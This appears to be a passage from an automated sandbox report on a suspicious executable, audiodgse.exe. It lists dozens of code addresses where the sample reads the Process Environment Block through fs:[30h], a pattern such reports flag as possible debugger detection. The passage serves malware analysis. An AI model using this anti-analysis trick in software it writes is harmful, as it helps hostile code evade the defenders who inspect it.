                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0132A352 mov eax, dword ptr fs:[00000030h]8_2_0132A352
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01308350 mov ecx, dword ptr fs:[00000030h]8_2_01308350
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012E2349 mov eax, dword ptr fs:[00000030h]8_2_012E2349
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012E2349 mov eax, dword ptr fs:[00000030h]8_2_012E2349
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012E2349 mov eax, dword ptr fs:[00000030h]8_2_012E2349
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012E2349 mov eax, dword ptr fs:[00000030h]8_2_012E2349
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012E2349 mov eax, dword ptr fs:[00000030h]8_2_012E2349
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012E2349 mov eax, dword ptr fs:[00000030h]8_2_012E2349
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012E2349 mov eax, dword ptr fs:[00000030h]8_2_012E2349
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012E2349 mov eax, dword ptr fs:[00000030h]8_2_012E2349
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012E2349 mov eax, dword ptr fs:[00000030h]8_2_012E2349
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012E2349 mov eax, dword ptr fs:[00000030h]8_2_012E2349
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012E2349 mov eax, dword ptr fs:[00000030h]8_2_012E2349
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012E2349 mov eax, dword ptr fs:[00000030h]8_2_012E2349
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012E2349 mov eax, dword ptr fs:[00000030h]8_2_012E2349
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012E2349 mov eax, dword ptr fs:[00000030h]8_2_012E2349
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012E2349 mov eax, dword ptr fs:[00000030h]8_2_012E2349
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012E035C mov eax, dword ptr fs:[00000030h]8_2_012E035C
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012E035C mov eax, dword ptr fs:[00000030h]8_2_012E035C
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012E035C mov eax, dword ptr fs:[00000030h]8_2_012E035C
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012E035C mov ecx, dword ptr fs:[00000030h]8_2_012E035C
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012E035C mov eax, dword ptr fs:[00000030h]8_2_012E035C
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012E035C mov eax, dword ptr fs:[00000030h]8_2_012E035C
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0133634F mov eax, dword ptr fs:[00000030h]8_2_0133634F
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0128438F mov eax, dword ptr fs:[00000030h]8_2_0128438F
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0128438F mov eax, dword ptr fs:[00000030h]8_2_0128438F
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0125E388 mov eax, dword ptr fs:[00000030h]8_2_0125E388
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0125E388 mov eax, dword ptr fs:[00000030h]8_2_0125E388
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0125E388 mov eax, dword ptr fs:[00000030h]8_2_0125E388
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01258397 mov eax, dword ptr fs:[00000030h]8_2_01258397
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01258397 mov eax, dword ptr fs:[00000030h]8_2_01258397
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01258397 mov eax, dword ptr fs:[00000030h]8_2_01258397
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012703E9 mov eax, dword ptr fs:[00000030h]8_2_012703E9
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012703E9 mov eax, dword ptr fs:[00000030h]8_2_012703E9
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012703E9 mov eax, dword ptr fs:[00000030h]8_2_012703E9
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012703E9 mov eax, dword ptr fs:[00000030h]8_2_012703E9
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012703E9 mov eax, dword ptr fs:[00000030h]8_2_012703E9
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012703E9 mov eax, dword ptr fs:[00000030h]8_2_012703E9
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012703E9 mov eax, dword ptr fs:[00000030h]8_2_012703E9
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012703E9 mov eax, dword ptr fs:[00000030h]8_2_012703E9
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012963FF mov eax, dword ptr fs:[00000030h]8_2_012963FF
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0127E3F0 mov eax, dword ptr fs:[00000030h]8_2_0127E3F0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0127E3F0 mov eax, dword ptr fs:[00000030h]8_2_0127E3F0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0127E3F0 mov eax, dword ptr fs:[00000030h]8_2_0127E3F0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_013043D4 mov eax, dword ptr fs:[00000030h]8_2_013043D4
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_013043D4 mov eax, dword ptr fs:[00000030h]8_2_013043D4
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012683C0 mov eax, dword ptr fs:[00000030h]8_2_012683C0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012683C0 mov eax, dword ptr fs:[00000030h]8_2_012683C0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012683C0 mov eax, dword ptr fs:[00000030h]8_2_012683C0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012683C0 mov eax, dword ptr fs:[00000030h]8_2_012683C0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0126A3C0 mov eax, dword ptr fs:[00000030h]8_2_0126A3C0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0126A3C0 mov eax, dword ptr fs:[00000030h]8_2_0126A3C0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0126A3C0 mov eax, dword ptr fs:[00000030h]8_2_0126A3C0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0126A3C0 mov eax, dword ptr fs:[00000030h]8_2_0126A3C0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0126A3C0 mov eax, dword ptr fs:[00000030h]8_2_0126A3C0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0126A3C0 mov eax, dword ptr fs:[00000030h]8_2_0126A3C0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0130E3DB mov eax, dword ptr fs:[00000030h]8_2_0130E3DB
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0130E3DB mov eax, dword ptr fs:[00000030h]8_2_0130E3DB
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0130E3DB mov ecx, dword ptr fs:[00000030h]8_2_0130E3DB
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0130E3DB mov eax, dword ptr fs:[00000030h]8_2_0130E3DB
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012E63C0 mov eax, dword ptr fs:[00000030h]8_2_012E63C0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0131C3CD mov eax, dword ptr fs:[00000030h]8_2_0131C3CD
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0125823B mov eax, dword ptr fs:[00000030h]8_2_0125823B
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01310274 mov eax, dword ptr fs:[00000030h]8_2_01310274
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01310274 mov eax, dword ptr fs:[00000030h]8_2_01310274
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01310274 mov eax, dword ptr fs:[00000030h]8_2_01310274
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01310274 mov eax, dword ptr fs:[00000030h]8_2_01310274
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01310274 mov eax, dword ptr fs:[00000030h]8_2_01310274
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01310274 mov eax, dword ptr fs:[00000030h]8_2_01310274
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01310274 mov eax, dword ptr fs:[00000030h]8_2_01310274
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01310274 mov eax, dword ptr fs:[00000030h]8_2_01310274
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01310274 mov eax, dword ptr fs:[00000030h]8_2_01310274
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01310274 mov eax, dword ptr fs:[00000030h]8_2_01310274
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01310274 mov eax, dword ptr fs:[00000030h]8_2_01310274
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01310274 mov eax, dword ptr fs:[00000030h]8_2_01310274
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01264260 mov eax, dword ptr fs:[00000030h]8_2_01264260
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01264260 mov eax, dword ptr fs:[00000030h]8_2_01264260
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01264260 mov eax, dword ptr fs:[00000030h]8_2_01264260
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0125826B mov eax, dword ptr fs:[00000030h]8_2_0125826B
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0131A250 mov eax, dword ptr fs:[00000030h]8_2_0131A250
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0131A250 mov eax, dword ptr fs:[00000030h]8_2_0131A250
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012E8243 mov eax, dword ptr fs:[00000030h]8_2_012E8243
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012E8243 mov ecx, dword ptr fs:[00000030h]8_2_012E8243
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0133625D mov eax, dword ptr fs:[00000030h]8_2_0133625D
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0125A250 mov eax, dword ptr fs:[00000030h]8_2_0125A250
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01266259 mov eax, dword ptr fs:[00000030h]8_2_01266259
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012702A0 mov eax, dword ptr fs:[00000030h]8_2_012702A0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012702A0 mov eax, dword ptr fs:[00000030h]8_2_012702A0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012F62A0 mov eax, dword ptr fs:[00000030h]8_2_012F62A0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012F62A0 mov ecx, dword ptr fs:[00000030h]8_2_012F62A0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012F62A0 mov eax, dword ptr fs:[00000030h]8_2_012F62A0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012F62A0 mov eax, dword ptr fs:[00000030h]8_2_012F62A0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012F62A0 mov eax, dword ptr fs:[00000030h]8_2_012F62A0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012F62A0 mov eax, dword ptr fs:[00000030h]8_2_012F62A0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012E0283 mov eax, dword ptr fs:[00000030h]8_2_012E0283
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012E0283 mov eax, dword ptr fs:[00000030h]8_2_012E0283
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012E0283 mov eax, dword ptr fs:[00000030h]8_2_012E0283
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0129E284 mov eax, dword ptr fs:[00000030h]8_2_0129E284
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0129E284 mov eax, dword ptr fs:[00000030h]8_2_0129E284
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012702E1 mov eax, dword ptr fs:[00000030h]8_2_012702E1
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012702E1 mov eax, dword ptr fs:[00000030h]8_2_012702E1
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012702E1 mov eax, dword ptr fs:[00000030h]8_2_012702E1
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0126A2C3 mov eax, dword ptr fs:[00000030h]8_2_0126A2C3
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0126A2C3 mov eax, dword ptr fs:[00000030h]8_2_0126A2C3
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0126A2C3 mov eax, dword ptr fs:[00000030h]8_2_0126A2C3
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0126A2C3 mov eax, dword ptr fs:[00000030h]8_2_0126A2C3
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0126A2C3 mov eax, dword ptr fs:[00000030h]8_2_0126A2C3
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_013362D6 mov eax, dword ptr fs:[00000030h]8_2_013362D6
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01270535 mov eax, dword ptr fs:[00000030h]8_2_01270535
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01270535 mov eax, dword ptr fs:[00000030h]8_2_01270535
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01270535 mov eax, dword ptr fs:[00000030h]8_2_01270535
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01270535 mov eax, dword ptr fs:[00000030h]8_2_01270535
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01270535 mov eax, dword ptr fs:[00000030h]8_2_01270535
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01270535 mov eax, dword ptr fs:[00000030h]8_2_01270535
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0128E53E mov eax, dword ptr fs:[00000030h]8_2_0128E53E
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0128E53E mov eax, dword ptr fs:[00000030h]8_2_0128E53E
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0128E53E mov eax, dword ptr fs:[00000030h]8_2_0128E53E
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0128E53E mov eax, dword ptr fs:[00000030h]8_2_0128E53E
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0128E53E mov eax, dword ptr fs:[00000030h]8_2_0128E53E
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012F6500 mov eax, dword ptr fs:[00000030h]8_2_012F6500
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01334500 mov eax, dword ptr fs:[00000030h]8_2_01334500
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01334500 mov eax, dword ptr fs:[00000030h]8_2_01334500
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01334500 mov eax, dword ptr fs:[00000030h]8_2_01334500
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01334500 mov eax, dword ptr fs:[00000030h]8_2_01334500
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01334500 mov eax, dword ptr fs:[00000030h]8_2_01334500
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01334500 mov eax, dword ptr fs:[00000030h]8_2_01334500
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01334500 mov eax, dword ptr fs:[00000030h]8_2_01334500
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0129656A mov eax, dword ptr fs:[00000030h]8_2_0129656A
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0129656A mov eax, dword ptr fs:[00000030h]8_2_0129656A
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0129656A mov eax, dword ptr fs:[00000030h]8_2_0129656A
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01268550 mov eax, dword ptr fs:[00000030h]8_2_01268550
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01268550 mov eax, dword ptr fs:[00000030h]8_2_01268550
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012E05A7 mov eax, dword ptr fs:[00000030h]8_2_012E05A7
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012E05A7 mov eax, dword ptr fs:[00000030h]8_2_012E05A7
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012E05A7 mov eax, dword ptr fs:[00000030h]8_2_012E05A7
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012845B1 mov eax, dword ptr fs:[00000030h]8_2_012845B1
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012845B1 mov eax, dword ptr fs:[00000030h]8_2_012845B1
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01294588 mov eax, dword ptr fs:[00000030h]8_2_01294588
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01262582 mov eax, dword ptr fs:[00000030h]8_2_01262582
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01262582 mov ecx, dword ptr fs:[00000030h]8_2_01262582
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0129E59C mov eax, dword ptr fs:[00000030h]8_2_0129E59C
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0129C5ED mov eax, dword ptr fs:[00000030h]8_2_0129C5ED
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0129C5ED mov eax, dword ptr fs:[00000030h]8_2_0129C5ED
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012625E0 mov eax, dword ptr fs:[00000030h]8_2_012625E0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0128E5E7 mov eax, dword ptr fs:[00000030h]8_2_0128E5E7
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0128E5E7 mov eax, dword ptr fs:[00000030h]8_2_0128E5E7
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0128E5E7 mov eax, dword ptr fs:[00000030h]8_2_0128E5E7
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0128E5E7 mov eax, dword ptr fs:[00000030h]8_2_0128E5E7
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0128E5E7 mov eax, dword ptr fs:[00000030h]8_2_0128E5E7
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0128E5E7 mov eax, dword ptr fs:[00000030h]8_2_0128E5E7
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0128E5E7 mov eax, dword ptr fs:[00000030h]8_2_0128E5E7
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0128E5E7 mov eax, dword ptr fs:[00000030h]8_2_0128E5E7
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0129E5CF mov eax, dword ptr fs:[00000030h]8_2_0129E5CF
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0129E5CF mov eax, dword ptr fs:[00000030h]8_2_0129E5CF
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012665D0 mov eax, dword ptr fs:[00000030h]8_2_012665D0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0129A5D0 mov eax, dword ptr fs:[00000030h]8_2_0129A5D0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0129A5D0 mov eax, dword ptr fs:[00000030h]8_2_0129A5D0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0125C427 mov eax, dword ptr fs:[00000030h]8_2_0125C427
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0125E420 mov eax, dword ptr fs:[00000030h]8_2_0125E420
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0125E420 mov eax, dword ptr fs:[00000030h]8_2_0125E420
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0125E420 mov eax, dword ptr fs:[00000030h]8_2_0125E420
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012E6420 mov eax, dword ptr fs:[00000030h]8_2_012E6420
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012E6420 mov eax, dword ptr fs:[00000030h]8_2_012E6420
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012E6420 mov eax, dword ptr fs:[00000030h]8_2_012E6420
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012E6420 mov eax, dword ptr fs:[00000030h]8_2_012E6420
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012E6420 mov eax, dword ptr fs:[00000030h]8_2_012E6420
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012E6420 mov eax, dword ptr fs:[00000030h]8_2_012E6420
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012E6420 mov eax, dword ptr fs:[00000030h]8_2_012E6420
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0129A430 mov eax, dword ptr fs:[00000030h]8_2_0129A430
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01298402 mov eax, dword ptr fs:[00000030h]8_2_01298402
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01298402 mov eax, dword ptr fs:[00000030h]8_2_01298402
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01298402 mov eax, dword ptr fs:[00000030h]8_2_01298402
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012EC460 mov ecx, dword ptr fs:[00000030h]8_2_012EC460
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0128A470 mov eax, dword ptr fs:[00000030h]8_2_0128A470
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0128A470 mov eax, dword ptr fs:[00000030h]8_2_0128A470
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0128A470 mov eax, dword ptr fs:[00000030h]8_2_0128A470
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0131A456 mov eax, dword ptr fs:[00000030h]8_2_0131A456
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0129E443 mov eax, dword ptr fs:[00000030h]8_2_0129E443
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0129E443 mov eax, dword ptr fs:[00000030h]8_2_0129E443
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0129E443 mov eax, dword ptr fs:[00000030h]8_2_0129E443
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0129E443 mov eax, dword ptr fs:[00000030h]8_2_0129E443
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0129E443 mov eax, dword ptr fs:[00000030h]8_2_0129E443
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0129E443 mov eax, dword ptr fs:[00000030h]8_2_0129E443
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0129E443 mov eax, dword ptr fs:[00000030h]8_2_0129E443
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0129E443 mov eax, dword ptr fs:[00000030h]8_2_0129E443
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0128245A mov eax, dword ptr fs:[00000030h]8_2_0128245A
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0125645D mov eax, dword ptr fs:[00000030h]8_2_0125645D
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012664AB mov eax, dword ptr fs:[00000030h]8_2_012664AB
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012944B0 mov ecx, dword ptr fs:[00000030h]8_2_012944B0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012EA4B0 mov eax, dword ptr fs:[00000030h]8_2_012EA4B0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0131A49A mov eax, dword ptr fs:[00000030h]8_2_0131A49A
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012604E5 mov ecx, dword ptr fs:[00000030h]8_2_012604E5
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0129C720 mov eax, dword ptr fs:[00000030h]8_2_0129C720
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0129C720 mov eax, dword ptr fs:[00000030h]8_2_0129C720
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0129273C mov eax, dword ptr fs:[00000030h]8_2_0129273C
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0129273C mov ecx, dword ptr fs:[00000030h]8_2_0129273C
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0129273C mov eax, dword ptr fs:[00000030h]8_2_0129273C
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012DC730 mov eax, dword ptr fs:[00000030h]8_2_012DC730
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0129C700 mov eax, dword ptr fs:[00000030h]8_2_0129C700
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01260710 mov eax, dword ptr fs:[00000030h]8_2_01260710
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01290710 mov eax, dword ptr fs:[00000030h]8_2_01290710
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01268770 mov eax, dword ptr fs:[00000030h]8_2_01268770
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01270770 mov eax, dword ptr fs:[00000030h]8_2_01270770
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01270770 mov eax, dword ptr fs:[00000030h]8_2_01270770
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01270770 mov eax, dword ptr fs:[00000030h]8_2_01270770
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01270770 mov eax, dword ptr fs:[00000030h]8_2_01270770
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01270770 mov eax, dword ptr fs:[00000030h]8_2_01270770
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01270770 mov eax, dword ptr fs:[00000030h]8_2_01270770
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01270770 mov eax, dword ptr fs:[00000030h]8_2_01270770
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01270770 mov eax, dword ptr fs:[00000030h]8_2_01270770
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01270770 mov eax, dword ptr fs:[00000030h]8_2_01270770
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01270770 mov eax, dword ptr fs:[00000030h]8_2_01270770
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01270770 mov eax, dword ptr fs:[00000030h]8_2_01270770
